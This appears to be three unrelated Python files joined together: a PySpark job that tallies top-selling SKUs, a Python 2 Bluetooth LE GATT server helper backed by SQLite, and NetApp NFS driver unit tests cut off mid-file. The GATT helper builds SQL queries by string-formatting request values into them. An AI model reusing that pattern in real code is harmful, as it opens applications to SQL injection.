:param inter_uri: uri for where to save intermediate results.
:type force: str
:param force: either ``yes``, in which case forces recreation of
files, or ``no``, which in case if files already
exist then does nothing.
:type source_uri: str
:param source_uri: URI from where to read files.
"""
spark = SparkSession(sc)
for day in range(args.days_init, args.days_end - 1, -1):
formatted_day = self.get_formatted_date(day)
source_uri = args.source_uri.format(formatted_day)
inter_uri = args.inter_uri.format(formatted_day)
try:
inter_data = spark.read.json(inter_uri,
schema = self._load_top_seller_schema()).first()
if args.force == 'yes' or not inter_data:
self._process_datajet_day(sc,
source_uri,
inter_uri,
'overwrite')
except (Py4JJavaError, AnalysisException):
self._process_datajet_day(sc, source_uri, inter_uri)
finally:
print('processed data for {} day'.format(day))
def _process_datajet_day(self, sc, uri, inter_uri, mode=None):
"""Gets datajet json like files and transforms them into data like
[(sku, items_sold),...] saving it in the end.
:type sc: spark context
:param sc: context to run spark jobs.
:type uri: str
:param uri: where the files are located.
:type inter_uri: str
:param inter_uri: where intermediate results should be saved.
:type mode: str
:param mode: indicates how data should be saved. If ``None`` then
throws error if file already exist. If ``overwrite`` then
deletes previous file and saves new one.
"""
sc.textFile(uri) \
.flatMap(lambda x: self._process_json(x)) \
.filter(lambda x: x) \
.reduceByKey(operator.add) \
.toDF(schema=self._load_top_seller_schema()) \
.write.json(inter_uri, compression='gzip', mode=mode)
def _load_top_seller_schema(self):
"""Loads schema for top seller intermediate data saved like
[sku, items_sold]
:rtype: `pyspark.sql.StructType`
:returns: schema for top selling data
"""
return stypes.StructType(fields=[
stypes.StructField("item_key", stypes.StringType()),
stypes.StructField("value", stypes.IntegerType())])
def build_marreco(self, sc, args):
"""Main method for building Marreco's algorithms and saving results
for later usage.
:type sc: `pyspark.SparkContext`
:param sc: spark context for running jobs.
:type args: Namespace
:param args:
:type days_init: int
:param days_init: which date time that will be used for reading data
with intermediary daily results.
:type days_end: int
:param days_end: until what file to read input data.
:type inter_uri: str
:param inter_uri: URI where intermediary results should be read from
:type source_uri: str
:param source_uri: source from where to read input data
:type force: str
:param force: either ``yes`` in which case replace intermediate files
or ``no`` where nothing is done if file already exists.
:type top_seller_uri: str
:param top_seller_uri: URI for where to save results
"""
spark = SparkSession(sc)
data = sc.emptyRDD()
for day in range(args.days_init, args.days_end - 1, -1):
formatted_day = self.get_formatted_date(day)
inter_uri = self._render_inter_uri(args.inter_uri.format(
formatted_day))
data = data.union(spark.read.json(inter_uri,
schema=self._load_top_seller_schema()).rdd)
data = data.reduceByKey(operator.add) \
.sortBy(lambda x: x[1], False)
self._save_top_seller_matrix(args.top_seller_uri, data)
def _save_top_seller_matrix(self, top_seller_uri, data):
"""Loads top seller schema and saves final results as
[(item_key, items_sold), (item_key, items_sold)...]}
:type top_seller_uri: str
:param top_seller_uri: uri for where to save the matrix.
:type data: RDD
:param data: RDD with data like [item_key, items_sold]
"""
data.toDF(schema=self._load_top_seller_schema()) \
.write.json(top_seller_uri, compression='gzip', mode='overwrite')
def _render_inter_uri(self, inter_uri, name_pattern='part-*'):
"""Helper function to process inter_uri's for later usage.
:type inter_uri: str
:param inter_uri: URI used for saving intermediate data transformation
results.
:type name_pattern: str
:param name_pattern: pattern used by spark to save multiple files.
:rtype: str
:returns: URI rendered template for retrieving data back to code.
"""
return os.path.join(inter_uri, name_pattern)
@staticmethod
def _process_json(row):
"""Mapper function to extract from each line from datajet file
and return interactions between customers and sold skus.
:type row: str
:param row: json string with datajet data.
:rtype: list
:returns: `yield` on [sku, items_sold]
"""
try:
r = json.loads(row)
if (r['event']['source']['tracker'] == 'fish' and
'local_timestamp' in r['event'] and
r['event']['identifiers']['djUCID']['value'] and
r['event']['type'] == "orderconfirmation"):
for e in list(zip([e['group_id'] for e in
r['event']['details']['products']],
([int(e) for e in
r['event']['details']['quantities']]))):
yield e
except:
yield []
@staticmethod
def process_sysargs(args):
parser = argparse.ArgumentParser()
parser.add_argument('--days_init',
dest='days_init',
type=int,
help=("Total amount of days to come back in time "
"from today's date."))
parser.add_argument('--days_end',
dest='days_end',
type=int,
help=("Total amount of days to come back in time "
"from today's date."))
parser.add_argument('--source_uri',
dest='source_uri',
type=str,
help=("URI template from where to read source "
"files from."))
parser.add_argument('--inter_uri',
dest='inter_uri',
type=str,
help=('URI for saving intermediary results.'))
parser.add_argument('--top_seller_uri',
dest='top_seller_uri',
type=str,
help=('URI for saving top_seller results.'))
parser.add_argument('--force',
dest='force',
type=str,
help=('If ``yes`` then replace all files with new ones. '
' If ``no``, then no replacing happens.'))
args = parser.parse_args(args)
return args
|
|
'''
Created on Jan 11, 2014
@author: mxu
This module does dirty work to handle gatt related request
'''
import sqlite3 as lite
import utils
import bluetooth
class sqls:
sql_select_handles_in_range = '''
select handle, value, properties, permission from defaultTable where uuid = "%s" and handle >= "%s" and handle < "%s";
'''
sql_select_primary_service_by_uuid = '''
select handle from defaultTable where uuid = "%s" and value = "%s";
'''
sql_select_handles = '''
select handle from defaultTable;
'''
sql_select_uuid_by_handle = '''
select uuid from defaultTable where handle = "%s";
'''
sql_select_value_by_handle = '''
select value, properties, permission from defaultTable where handle = "%s";
'''
ATT_MTU = 20
class BLEGattHelper:
'''
classdocs
'''
def __init__(self,ble_builder):
'''
Constructor
'''
self.ble_builder = ble_builder
self.handles = self._get_handles()
self.preserved_handle_eom = "0013"
def AttGrpTypeRspHandler(self, dictionary):
'''
lookup the gatt table and select specific attributes to return
'''
def _sendATTGrpTypeRsp(conn_handle, data, data_length):
# data = "\x14\x00\x17\x00\x9d\x28\xd9\x02\x6e\x8a\x5a\xa8\xe7\x41\x41\x38\xa0\xf2\x83\xdb"
print(utils.printOutput(self.ble_builder.send("fd11", conn_handle = conn_handle, data_length = data_length, value = data)))
def _get_pdu(data):
eof = "\xff\xff\xff\xff"
pdu = ""
length = "\x06"
# if data:
# try:
#
# for i in range(len(data)):
# if data[i][0] == "0014":
# pass
# temp_start = utils.stringToSByteInHex(data[i][0])[::-1] #start handle
# temp_value = utils.stringToSByteInHex(data[i][1].replace(":","")) #value
# #get end handle
# if i + 1 > range(len(data))[-1]:
# temp_end = utils.stringToSByteInHex(self.handles[-1])[::-1] #this is the last service, end handle is the last one of all handles
# else:
# temp_end = utils.stringToSByteInHex(utils.stringMinusInHex(data[i+1][0],1))[::-1] #this is not the last service then the end handle is the handle of next service minus one
#
#
# if len(temp_value) == 16: #this is 128bit uuid, then only return one service info
# pdu = temp_start + temp_end + temp_value
# break
# else:
# if len(pdu) + 4 + len(temp_value) > 12 : #if total pdu exceeds the maxmium length, do not append, only two services returned each time
# break
# else:
# pdu = pdu + temp_start + temp_end + temp_value #append pdu
# except Exception, e:
# print e
# pdu = eof
# else:
# pdu = eof
if data:
try:
for i in range(len(data)):
if data[i][0] == "001b":
pass
temp_start = utils.stringToSByteInHex(data[i][0])[::-1] #start handle
temp_value = utils.stringToSByteInHex(data[i][1].replace(":","")) #value
#get end handle
if i + 1 > range(len(data))[-1]:
temp_end = utils.stringToSByteInHex(self.handles[-1])[::-1] #this is the last service, end handle is the last one of all handles
else:
temp_end = utils.stringToSByteInHex(utils.stringMinusInHex(data[i+1][0],1))[::-1] #this is not the last service then the end handle is the handle of next service minus one
if len(temp_value) == 16: #this is 128bit uuid, then only return one service info
pdu = temp_start + temp_end + temp_value
length = "\x14" #set lenght to fit 128bit uuid
break
else:
if len(pdu) + 4 + len(temp_value) > ATT_MTU : #if total pdu exceeds the maxmium length, do not append, only two services returned each time
break
elif i + 1 <= range(len(data))[-1]:
next_value = utils.stringToSByteInHex(data[i+1][1].replace(":",""))
if len(next_value) == 16:
if pdu:
pdu = pdu + temp_start + temp_end + temp_value
else:
pdu = temp_start + temp_end + temp_value
break
else:
pdu = pdu + temp_start + temp_end + temp_value
else:
pdu = pdu + temp_start + temp_end + temp_value #append pdu
except Exception, e:
print e
pdu = eof
else:
pdu = eof
return pdu, length
conn_handle = dictionary['conn_handle']
start_handle = dictionary['start_handle']
end_handle = dictionary['end_handle']
group_type = dictionary['group_type']
conn_handle = conn_handle[0]
uuid = group_type[1]
start = start_handle[1]
end = end_handle[1]
sql = sqls.sql_select_handles_in_range % (uuid, start, end)
data = self._execute_sql(sql)
pdu = _get_pdu(data)
_sendATTGrpTypeRsp(conn_handle, pdu[0], pdu[1])
pass
def ATTReadByTypeRspHandler(self, dictionary):
'''
Limitation:
1. cuurently only consider one key-value pair to return, it is becuase most of cases only one key should be found
2. no permission restriction, all data are readable
'''
def _sendATTReadByTypeRsp(conn_handle, value, data_length):
print("COMMAND: ATT_ReadByTypeRsp")
print(utils.printOutput(self.ble_builder.send("fd09", conn_handle = conn_handle, data_length = data_length, value = value)))
def _get_pdu(data):
handle = utils.stringToSByteInHex(data[0][0])[::-1]
value = utils.stringToSByteInHex(data[0][1], ":")
pdu = handle + value
return pdu
conn_handle = dictionary['conn_handle']
start_handle = dictionary['start_handle']
end_handle = dictionary['end_handle']
_type = dictionary['type']
conn_handle = conn_handle[0]
start = start_handle[1]
end = end_handle[1]
uuid = _type[1]
#get data from gatt table
sql = sqls.sql_select_handles_in_range % (uuid, start, end)
data = self._execute_sql(sql)
pdu = _get_pdu(data)
data_length = utils.getByteDataLengh(pdu)
_sendATTReadByTypeRsp(conn_handle, pdu, data_length)
def ATTReadBlobRspHandler(self, dictionary):
'''
lookup value in gatt table for a given handle
'''
def _sendATTReadBlobRsp(conn_handle, value):
print("COMMAND: ATT_ReadBlobRsp")
print(utils.printOutput(self.ble_builder.send("fd0d", conn_handle = conn_handle, value = value)))
conn_handle = dictionary['conn_handle']
handle = dictionary['handle']
req_opcode = dictionary['event'][0]
conn_handle = conn_handle[0]
handle_str = handle[1]
handle_raw = utils.stringToSByteInHex(handle[1])
#get data from gatt table
sql = sqls.sql_select_value_by_handle % handle_str
data = self._execute_sql(sql)
value = utils.stringToSByteInHex(data[0][0], ":")
data_property = data[0][1]
data_permission = data[0][2]
if data_property:
properties = utils.stringToSByteInHex(data_property)
else:
properties = None
if data_permission:
permission = utils.stringToSByteInHex(data_permission)
else:
permission = None
if self._canRead(properties, permission):
_sendATTReadBlobRsp(conn_handle, value)
else:
self.ATTErrorRspHandler(conn_handle, req_opcode[-1], handle_raw, bluetooth.errorRsp.READ_NOT_PERMITTED)
def ATTWriteReqHandler(self, dictionary, func):
'''
handle write req,
Limitation: no signature and command type checking
'''
def _sendATTWriteRsp(conn_handle):
print("COMMAND: ATT_WriteRsp")
print(utils.printOutput(self.ble_builder.send("fd13", conn_handle = conn_handle)))
def _handleIndication(conn_handle, handle, start_handle, end_handle): #to-do refactor for better usability
print("COMMAND: ATT_HandleValueIndication")
handle = handle
value = start_handle+end_handle
# print(utils.printOutput(self.ble_builder.send("fd1d", conn_handle = conn_handle, handle = handle, value = value)))
conn_handle = dictionary['conn_handle'][0]
handle = dictionary['handle']
value = dictionary['value']
value_str = value[1]
handle_raw = handle[0]
handle_str = handle[1]
_sendATTWriteRsp(conn_handle)
#get data from gatt table
if handle_str < self.preserved_handle_eom: #attampt to write preserved services
if handle_str == "0009" and value_str == "0002": #ask for service changes, tempararily fix to return non-reserved handles
start_handle = utils.stringToSByteInHex(utils.stringMinusInHex(self.preserved_handle_eom, -1))[::-1]
end_handle = utils.stringToSByteInHex(self.handles[-1])[::-1]
char_handle = utils.hexMinusInHex(handle_raw, 1)
_handleIndication(conn_handle, char_handle, start_handle, end_handle)
else: #external services, tempararily fix to trigger call notification call back or do nothing
if value_str == "0001": #Notification
sql = sqls.sql_select_uuid_by_handle % utils.stringMinusInHex(handle_str, 1)
data = self._execute_sql(sql)
uuid = data[0][0]
char_handle = utils.hexMinusInHex(handle_raw, 1)
func(uuid, char_handle, conn_handle)
def ATTErrorRspHandler(self, conn_handle, req_opcode, handle, error_code):
print("COMMAND: ATT_ErrorRsp")
handle = handle
print(utils.printOutput(self.ble_builder.send("fd01", conn_handle = conn_handle, req_opcode = req_opcode, handle = handle, error_code = error_code)))
def _get_handles(self):
sql = sqls.sql_select_handles
data = self._execute_sql(sql)
handles = []
for row in data:
handles.append(row[0])
return handles
def _canRead(self, properties, permission):
'''
Logic:
1. if permission is None and properties is Read, can Read
2. if permission is readable or read/write, then if properties is None, can read
3. if permission is readable or read/write, then if properties is Read, can read
'''
if not permission:
if properties:
if (properties[-1] == bluetooth.properties.Read):
return True
if (permission == bluetooth.attrPermission.GATT_PERMIT_READ) \
or (permission == bluetooth.attrPermission.GATT_PERMIT_READ_AND_WRITE):
if not properties:
return True
if (properties[-1] == bluetooth.properties.Read):
return True
return False
def _execute_sql(self, sql):
try:
data = []
conn = lite.connect('gattServer.rdb')
conn.text_factory = str
cursor = conn.cursor()
cursor.execute(sql)
if "select" in sql:
for row in cursor:
data.append(row)
else:
pass
conn.commit()
except Exception, e:
print e
finally:
if 'cursor' in locals():
cursor.close()
if 'conn' in locals():
conn.close()
return data
def _get_pdu( data):
eof = "\xff\xff\xff\xff"
pdu = ""
if data:
try:
for i in range(len(data)):
if data[i][0] == "0014":
pass
temp_start = utils.stringToSByteInHex(data[i][0])[::-1] #start handle
temp_value = utils.stringToSByteInHex(data[i][1].replace(":","")) #value
#get end handle
if i + 1 > range(len(data))[-1]:
temp_end = utils.stringToSByteInHex("001b")[::-1] #this is the last service, end handle is the last one of all handles
else:
temp_end = utils.stringToSByteInHex(utils.stringMinusInHex(data[i+1][0],1))[::-1] #this is not the last service then the end handle is the handle of next service minus one
if len(temp_value) == 16: #this is 128bit uuid, then only return one service info
pdu = temp_start + temp_end + temp_value
break
else:
if len(pdu) + 4 + len(temp_value) > 12 : #if total pdu exceeds the maxmium length, do not append, only two services returned each time
break
elif i + 1 <= range(len(data))[-1]:
next_value = utils.stringToSByteInHex(data[i+1][1].replace(":",""))
if len(next_value) == 16:
if pdu:
pdu = pdu + temp_start + temp_end + temp_value
break
else:
pdu = temp_start + temp_end + temp_value
break
else:
pdu = pdu + temp_start + temp_end + temp_value
else:
pdu = pdu + temp_start + temp_end + temp_value #append pdu
except Exception, e:
print e
pdu = eof
else:
pdu = eof
return pdu.encode('hex')
if __name__ == '__main__':
data = [("0001", "00:04")]
print _get_pdu(data)
data = [("0001", "00:00"), ("0004", "01:02")]
print _get_pdu(data)
data = [("0005", "00:00"), ("0008", "01:02"), ("000a", "02:02")]
print _get_pdu(data)
data = [("000d", "00:00"), ("001a", "01:02"), ("001f", "02:02"), ("0022", "03:04")]
print _get_pdu(data)
data = [("0001", "00:00"), ("0004", "01:02:03:04:05:06:07:08:09:10:11:12:13:14:15:16:"), ("0008", "02:02")]
print _get_pdu(data)
data = [("0001", "00:00"), ("0003", "abef"), ("000a", "01:02:03:04:05:06:07:08:09:10:11:12:13:14:15:16:"), ("0008", "02:02")]
print _get_pdu(data)
data = [("0001", "00:00"), ("0003", "abef"), ("0007", "dddd"), ("000a", "01:02:03:04:05:06:07:08:09:10:11:12:13:14:15:16:"), ("0008", "02:02")]
print _get_pdu(data)
data = [("0004", "01:02:03:04:05:06:07:08:09:10:11:12:13:14:15:16:"),("0001", "00:00"), ("0008", "02:02")]
print _get_pdu(data)
data = []
print _get_pdu(data)
|
|
# Copyright (c) 2014 Andrew Kerr. All rights reserved.
# Copyright (c) 2015 Tom Barron. All rights reserved.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit tests for the NetApp NFS storage driver
"""
import os
import copy
import ddt
import mock
from os_brick.remotefs import remotefs as remotefs_brick
from oslo_utils import units
from cinder import exception
from cinder import test
from cinder.tests.unit.volume.drivers.netapp.dataontap import fakes as fake
from cinder import utils
from cinder.volume.drivers.netapp.dataontap.client import api as netapp_api
from cinder.volume.drivers.netapp.dataontap import nfs_base
from cinder.volume.drivers.netapp import utils as na_utils
from cinder.volume.drivers import nfs
@ddt.ddt
class NetAppNfsDriverTestCase(test.TestCase):
def setUp(self):
super(NetAppNfsDriverTestCase, self).setUp()
configuration = mock.Mock()
configuration.reserved_percentage = 0
configuration.nfs_mount_point_base = '/mnt/test'
configuration.reserved_percentage = 0
configuration.max_over_subscription_ratio = 1.1
kwargs = {'configuration': configuration}
with mock.patch.object(utils, 'get_root_helper',
return_value=mock.Mock()):
with mock.patch.object(remotefs_brick, 'RemoteFsClient',
return_value=mock.Mock()):
self.driver = nfs_base.NetAppNfsDriver(**kwargs)
self.driver.ssc_enabled = False
self.driver.db = mock.Mock()
@mock.patch.object(nfs.NfsDriver, 'do_setup')
@mock.patch.object(na_utils, 'check_flags')
def test_do_setup(self, mock_check_flags, mock_super_do_setup):
self.driver.do_setup(mock.Mock())
self.assertTrue(mock_check_flags.called)
self.assertTrue(mock_super_do_setup.called)
def test_get_share_capacity_info(self):
mock_get_capacity = self.mock_object(self.driver, '_get_capacity_info')
mock_get_capacity.return_value = fake.CAPACITY_VALUES
expected_total_capacity_gb = na_utils.round_down(
fake.TOTAL_BYTES / units.Gi, '0.01')
expected_free_capacity_gb = (na_utils.round_down(
fake.AVAILABLE_BYTES / units.Gi, '0.01'))
expected_reserved_percentage = round(
self.driver.configuration.reserved_percentage)
result = self.driver._get_share_capacity_info(fake.NFS_SHARE)
self.assertEqual(expected_total_capacity_gb,
result['total_capacity_gb'])
self.assertEqual(expected_free_capacity_gb,
result['free_capacity_gb'])
self.assertEqual(expected_reserved_percentage,
round(result['reserved_percentage']))
def test_get_capacity_info_ipv4_share(self):
expected = fake.CAPACITY_VALUES
self.driver.zapi_client = mock.Mock()
get_capacity = self.driver.zapi_client.get_flexvol_capacity
get_capacity.return_value = fake.CAPACITY_VALUES
result = self.driver._get_capacity_info(fake.NFS_SHARE_IPV4)
self.assertEqual(expected, result)
get_capacity.assert_has_calls([
mock.call(fake.EXPORT_PATH)])
def test_get_capacity_info_ipv6_share(self):
expected = fake.CAPACITY_VALUES
self.driver.zapi_client = mock.Mock()
get_capacity = self.driver.zapi_client.get_flexvol_capacity
get_capacity.return_value = fake.CAPACITY_VALUES
result = self.driver._get_capacity_info(fake.NFS_SHARE_IPV6)
self.assertEqual(expected, result)
get_capacity.assert_has_calls([
mock.call(fake.EXPORT_PATH)])
def test_create_volume(self):
self.mock_object(self.driver, '_ensure_shares_mounted')
self.mock_object(na_utils, 'get_volume_extra_specs')
self.mock_object(self.driver, '_do_create_volume')
self.mock_object(self.driver, '_do_qos_for_volume')
update_ssc = self.mock_object(self.driver, '_update_stale_vols')
expected = {'provider_location': fake.NFS_SHARE}
result = self.driver.create_volume(fake.NFS_VOLUME)
self.assertEqual(expected, result)
self.assertEqual(0, update_ssc.call_count)
def test_create_volume_no_pool(self):
volume = copy.deepcopy(fake.NFS_VOLUME)
volume['host'] = '%s@%s' % (fake.HOST_NAME, fake.BACKEND_NAME)
self.mock_object(self.driver, '_ensure_shares_mounted')
self.assertRaises(exception.InvalidHost,
self.driver.create_volume,
volume)
def test_create_volume_exception(self):
self.mock_object(self.driver, '_ensure_shares_mounted')
self.mock_object(na_utils, 'get_volume_extra_specs')
mock_create = self.mock_object(self.driver, '_do_create_volume')
mock_create.side_effect = Exception
update_ssc = self.mock_object(self.driver, '_update_stale_vols')
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume,
fake.NFS_VOLUME)
self.assertEqual(0, update_ssc.call_count)
def test_create_volume_from_snapshot(self):
provider_location = fake.POOL_NAME
snapshot = fake.CLONE_SOURCE
self.mock_object(self.driver, '_clone_source_to_destination_volume',
mock.Mock(return_value=provider_location))
result = self.driver.create_cloned_volume(fake.NFS_VOLUME,
snapshot)
self.assertEqual(provider_location, result)
def test_clone_source_to_destination_volume(self):
self.mock_object(self.driver, '_get_volume_location', mock.Mock(
return_value=fake.POOL_NAME))
self.mock_object(na_utils, 'get_volume_extra_specs', mock.Mock(
return_value=fake.EXTRA_SPECS))
self.mock_object(
self.driver,
'_clone_with_extension_check')
self.mock_object(self.driver, '_do_qos_for_volume')
expected = {'provider_location': fake.POOL_NAME}
result = self.driver._clone_source_to_destination_volume(
fake.CLONE_SOURCE, fake.CLONE_DESTINATION)
self.assertEqual(expected, result)
def test_clone_source_to_destination_volume_with_do_qos_exception(self):
self.mock_object(self.driver, '_get_volume_location', mock.Mock(
return_value=fake.POOL_NAME))
self.mock_object(na_utils, 'get_volume_extra_specs', mock.Mock(
return_value=fake.EXTRA_SPECS))
self.mock_object(
self.driver,
'_clone_with_extension_check')
self.mock_object(self.driver, '_do_qos_for_volume', mock.Mock(
side_effect=Exception))
self.assertRaises(
exception.VolumeBackendAPIException,
self.driver._clone_source_to_destination_volume,
fake.CLONE_SOURCE,
fake.CLONE_DESTINATION)
def test_clone_with_extension_check_equal_sizes(self):
clone_source = copy.deepcopy(fake.CLONE_SOURCE)
clone_source['size'] = fake.VOLUME['size']
self.mock_object(self.driver, '_clone_backing_file_for_volume')
self.mock_object(self.driver, 'local_path')
mock_discover = self.mock_object(self.driver,
'_discover_file_till_timeout')
mock_discover.return_value = True
self.mock_object(self.driver, '_set_rw_permissions')
mock_extend_volume = self.mock_object(self.driver, 'extend_volume')
self.driver._clone_with_extension_check(clone_source, fake.NFS_VOLUME)
self.assertEqual(0, mock_extend_volume.call_count)
def test_clone_with_extension_check_unequal_sizes(self):
clone_source = copy.deepcopy(fake.CLONE_SOURCE)
clone_source['size'] = fake.VOLUME['size'] + 1
self.mock_object(self.driver, '_clone_backing_file_for_volume')
self.mock_object(self.driver, 'local_path')
mock_discover = self.mock_object(self.driver,
'_discover_file_till_timeout')
mock_discover.return_value = True
self.mock_object(self.driver, '_set_rw_permissions')
mock_extend_volume = self.mock_object(self.driver, 'extend_volume')
self.driver._clone_with_extension_check(clone_source, fake.NFS_VOLUME)
self.assertEqual(1, mock_extend_volume.call_count)
def test_clone_with_extension_check_extend_exception(self):
clone_source = copy.deepcopy(fake.CLONE_SOURCE)
clone_source['size'] = fake.VOLUME['size'] + 1
self.mock_object(self.driver, '_clone_backing_file_for_volume')
self.mock_object(self.driver, 'local_path')
mock_discover = self.mock_object(self.driver,
'_discover_file_till_timeout')
mock_discover.return_value = True
self.mock_object(self.driver, '_set_rw_permissions')
mock_extend_volume = self.mock_object(self.driver, 'extend_volume')
mock_extend_volume.side_effect = Exception
mock_cleanup = self.mock_object(self.driver,
'_cleanup_volume_on_failure')
self.assertRaises(exception.CinderException,
self.driver._clone_with_extension_check,
clone_source,
fake.NFS_VOLUME)
self.assertEqual(1, mock_cleanup.call_count)
def test_clone_with_extension_check_no_discovery(self):
self.mock_object(self.driver, '_clone_backing_file_for_volume')
self.mock_object(self.driver, 'local_path')
self.mock_object(self.driver, '_set_rw_permissions')
mock_discover = self.mock_object(self.driver,
'_discover_file_till_timeout')
mock_discover.return_value = False
self.assertRaises(exception.CinderException,
self.driver._clone_with_extension_check,
fake.CLONE_SOURCE,
fake.NFS_VOLUME)
def test_create_cloned_volume(self):
provider_location = fake.POOL_NAME
src_vref = fake.CLONE_SOURCE
self.mock_object(self.driver, '_clone_source_to_destination_volume',
mock.Mock(return_value=provider_location))
result = self.driver.create_cloned_volume(fake.NFS_VOLUME,
src_vref)
self.assertEqual(provider_location, result)
def test_do_qos_for_volume(self):
self.assertRaises(NotImplementedError,
self.driver._do_qos_for_volume,
fake.NFS_VOLUME,
fake.EXTRA_SPECS)
def test_cleanup_volume_on_failure(self):
path = '%s/%s' % (fake.NFS_SHARE, fake.NFS_VOLUME['name'])
mock_local_path = self.mock_object(self.driver, 'local_path')
mock_local_path.return_value = path
mock_exists_check = self.mock_object(os.path, 'exists')
mock_exists_check.return_value = True
mock_delete = self.mock_object(self.driver, '_delete_file_at_path')
self.driver._cleanup_volume_on_failure(fake.NFS_VOLUME)
mock_delete.assert_has_calls([mock.call(path)])
def test_cleanup_volume_on_failure_no_path(self):
self.mock_object(self.driver, 'local_path')
mock_exists_check = self.mock_object(os.path, 'exists')
mock_exists_check.return_value = False
mock_delete = self.mock_object(self.driver, '_delete_file_at_path')
self.driver._cleanup_volume_on_failure(fake.NFS_VOLUME)
self.assertEqual(0, mock_delete.call_count)
def test_get_vol_for_share(self):
self.assertRaises(NotImplementedError,
self.driver._get_vol_for_share,
fake.NFS_SHARE)
def test_get_export_ip_path_volume_id_provided(self):
mock_get_host_ip = self.mock_object(self.driver, '_get_host_ip')
mock_get_host_ip.return_value = fake.IPV4_ADDRESS
mock_get_export_path = self.mock_object(
self.driver, '_get_export_path')
mock_get_export_path.return_value = fake.EXPORT_PATH
expected = (fake.IPV4_ADDRESS, fake.EXPORT_PATH)
result = self.driver._get_export_ip_path(fake.VOLUME_ID)
self.assertEqual(expected, result)
def test_get_export_ip_path_share_provided(self):
expected = (fake.SHARE_IP, fake.EXPORT_PATH)
result = self.driver._get_export_ip_path(share=fake.NFS_SHARE)
self.assertEqual(expected, result)
def test_get_export_ip_path_volume_id_and_share_provided(self):
mock_get_host_ip = self.mock_object(self.driver, '_get_host_ip')
mock_get_host_ip.return_value = fake.IPV4_ADDRESS
mock_get_export_path = self.mock_object(
self.driver, '_get_export_path')
mock_get_export_path.return_value = fake.EXPORT_PATH
expected = (fake.IPV4_ADDRESS, fake.EXPORT_PATH)
result = self.driver._get_export_ip_path(
fake.VOLUME_ID, fake.NFS_SHARE)
self.assertEqual(expected, result)
def test_get_export_ip_path_no_args(self):
self.assertRaises(exception.InvalidInput,
self.driver._get_export_ip_path)
def test_get_host_ip(self):
mock_get_provider_location = self.mock_object(
self.driver, '_get_provider_location')
mock_get_provider_location.return_value = fake.NFS_SHARE
expected = fake.SHARE_IP
result = self.driver._get_host_ip(fake.VOLUME_ID)
self.assertEqual(expected, result)
def test_get_export_path(self):
mock_get_provider_location = self.mock_object(
self.driver, '_get_provider_location')
mock_get_provider_location.return_value = fake.NFS_SHARE
expected = fake.EXPORT_PATH
result = self.driver._get_export_path(fake.VOLUME_ID)
self.assertEqual(expected, result)
def test_extend_volume(self):
new_size = 100
volume_copy = copy.copy(fake.VOLUME)
volume_copy['size'] = new_size
path = '%s/%s' % (fake.NFS_SHARE, fake.NFS_VOLUME['name'])
self.mock_object(self.driver,
'local_path',
mock.Mock(return_value=path))
mock_resize_image_file = self.mock_object(self.driver,
'_resize_image_file')
mock_get_volume_extra_specs = self.mock_object(
na_utils, 'get_volume_extra_specs',
mock.Mock(return_value=fake.EXTRA_SPECS))
mock_do_qos_for_volume = self.mock_object(self.driver,
'_do_qos_for_volume')
self.driver.extend_volume(fake.VOLUME, new_size)
mock_resize_image_file.assert_called_once_with(path, new_size)
mock_get_volume_extra_specs.assert_called_once_with(fake.VOLUME)
mock_do_qos_for_volume.assert_called_once_with(volume_copy,
fake.EXTRA_SPECS,
cleanup=False)
def test_extend_volume_resize_error(self):
new_size = 100
volume_copy = copy.copy(fake.VOLUME)
volume_copy['size'] = new_size
path = '%s/%s' % (fake.NFS_SHARE, fake.NFS_VOLUME['name'])
self.mock_object(self.driver,
'local_path',
mock.Mock(return_value=path))
mock_resize_image_file = self.mock_object(
self.driver, '_resize_image_file',
mock.Mock(side_effect=netapp_api.NaApiError))
mock_get_volume_extra_specs = self.mock_object(
na_utils, 'get_volume_extra_specs',
mock.Mock(return_value=fake.EXTRA_SPECS))
mock_do_qos_for_volume = self.mock_object(self.driver,
'_do_qos_for_volume')
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.extend_volume,
fake.VOLUME,
new_size)
mock_resize_image_file.assert_called_once_with(path, new_size)
self.assertFalse(mock_get_volume_extra_specs.called)
self.assertFalse(mock_do_qos_for_volume.called)
def test_extend_volume_qos_error(self):
new_size = 100
volume_copy = copy.copy(fake.VOLUME)
volume_copy['size'] = new_size
path = '%s/%s' % (fake.NFS_SHARE, fake.NFS_VOLUME['name'])
self.mock_object(self.driver,
'local_path',
mock.Mock(return_value=path))
mock_resize_image_file = self.mock_object(self.driver,
'_resize_image_file')
mock_get_volume_extra_specs = self.mock_object(
na_utils, 'get_volume_extra_specs',
mock.Mock(return_value=fake.EXTRA_SPECS))
mock_do_qos_for_volume = self.mock_object(
self.driver, '_do_qos_for_volume',
mock.Mock(side_effect=netapp_api.NaApiError))
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.extend_volume,
fake.VOLUME,
new_size)
mock_resize_image_file.assert_called_once_with(path, new_size)
mock_get_volume_extra_specs.assert_called_once_with(fake.VOLUME)
mock_do_qos_for_volume.assert_called_once_with(volume_copy,
fake.EXTRA_SPECS,
cleanup=False)
def test_is_share_clone_compatible(self):
self.assertRaises(NotImplementedError,
self.driver._is_share_clone_compatible,
fake.NFS_VOLUME,
fake.NFS_SHARE)
@ddt.data(
{'size': 12, 'thin': False, 'over': 1.0, 'res': 0, 'expected': True},
{'size': 12, 'thin': False, 'over': 1.0, 'res': 5, 'expected': False},
{'size': 12, 'thin': True, 'over': 1.0, 'res': 5, 'expected': False},
{'size': 12, 'thin': True, 'over': 1.1, 'res': 5, 'expected': True},
{'size': 240, 'thin': True, 'over': 20.0, 'res': 0, 'expected': True},
{'size': 241, 'thin': True, 'over': 20.0, 'res': 0, 'expected': False},
)
@ddt.unpack
def test_share_has_space_for_clone(self, size, thin, over, res, expected):
total_bytes = 20 * units.Gi
available_bytes = 12 * units.Gi
with mock.patch.object(self.driver,
'_get_capacity_info',
return_value=(
total_bytes, available_bytes)):
with mock.patch.object(self.driver,
'max_over_subscription_ratio',
over):
with mock.patch.object(self.driver,
'reserved_percentage',
res):
result = self.driver._share_has_space_for_clone(
fake.NFS_SHARE,
size,
thin=thin)
self.assertEqual(expected, result)
@ddt.data(
